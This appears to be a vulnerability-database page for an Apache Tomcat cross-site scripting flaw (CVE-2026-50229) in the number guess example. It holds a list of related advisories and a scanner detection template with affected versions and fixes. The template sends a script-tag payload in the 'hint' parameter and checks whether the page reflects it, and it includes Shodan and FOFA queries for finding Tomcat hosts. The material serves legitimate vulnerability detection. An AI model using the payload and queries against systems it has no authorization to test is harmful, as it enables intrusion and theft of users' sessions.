| Reporter | Title | Published | Views | Family All 42 |
|---|---|---|---|---|
| Exploit for Basic XSS in Apache Tomcat | 8 Jul 202608:56 | – | githubexploit | |
| CVE-2026-50229 | 29 Jun 202620:36 | – | attackerkb | |
| CVE-2026-50229 | 29 Jun 202621:40 | – | circl | |
| CVE-2026-50229 | 29 Jun 202620:36 | – | cve | |
| CVE-2026-50229 Apache Tomcat: XSS in number guess example | 29 Jun 202620:36 | – | cvelist | |
| CVE-2026-50229 | 29 Jun 202620:36 | – | debiancve | |
| EUVD-2026-40226 | 29 Jun 202620:36 | – | euvd | |
| K000162210: Multiple Apache Tomcat vulnerabilities | 13 Jul 202609:11 | – | f5 | |
| KLA91122 Multiple vulnerabilities in Apache Tomcat | 23 Jun 202600:00 | – | kaspersky | |
| CVE-2026-50229 | 29 Jun 202621:16 | – | nvd |
id: CVE-2026-50229
info:
name: Apache Tomcat - Cross-Site Scripting
author: yshahinzadeh,amirmsafari
severity: medium
description: |
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in the number guess example for Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.22, from 10.1.0-M1 through 10.1.55, from 9.0.0.M1 through 9.0.118, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Other versions that have reached end of support may also be affected. Users are recommended to upgrade to version 11.0.23, 10.1.56 or 9.0.119, which fix the issue.
impact: |
Remote attackers can execute scripts in users' browsers, potentially stealing cookies or performing actions on behalf of users.
remediation: |
Upgrade to versions 11.0.23, 10.1.56, or 9.0.119 or later.
reference:
- https://lists.apache.org/thread/wlt2no8bw45zl1w8byop4zfqphldf5j0
- https://www.cve.org/CVERecord?id=CVE-2026-50229
- https://tomcat.apache.org/security-11.html
- https://www.herodevs.com/vulnerability-directory/cve-2026-50229
classification:
cwe-id: CWE-80
cve-id: CVE-2026-50229
epss-score: 0.00455
epss-percentile: 0.36582
metadata:
verified: true
max-request: 1
vendor: apache
product: tomcat
shodan-query: html:"Apache Tomcat"
fofa-query: app="APACHE-Tomcat"
tags: cve,cve2026,apache,tomcat,xss
http:
- method: GET
path:
- "{{BaseURL}}/examples/jsp/num/numguess.jsp?guess=5&hint=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Number Guess'
condition: and
- type: word
part: content_type
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100ed0338f78ebefb118ef2e51c90f073c1b840935d4df4013c68e208b94cccefc4022100b309c97ed19ef08a67327fd1559cd7fd43ec79adb6677dd5df11168f3e0aac07:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation